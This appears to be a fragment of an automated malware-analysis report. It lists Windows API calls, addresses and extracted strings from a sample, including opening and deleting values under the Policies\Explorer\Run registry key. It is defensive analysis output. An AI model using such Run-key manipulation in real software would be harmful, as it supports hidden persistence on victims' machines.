                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D509,00000000,?,00000000), ref: 00413A6C
                                  • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A80
                                  Strings
                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                  • API ID: DeleteOpenValue
                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                  • API String ID: 2654517830-1051519024
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                  • GetLastError.KERNEL32 ref: 00440D85
                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                  • API ID: ByteCharMultiWide$ErrorLast
                                  • String ID:
                                  • API String ID: 1717984340-0
                                  APIs
                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411CB5
                                  • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                  • API ID: ErrorLastRead
                                  • String ID:
                                  • API String ID: 4100373531-0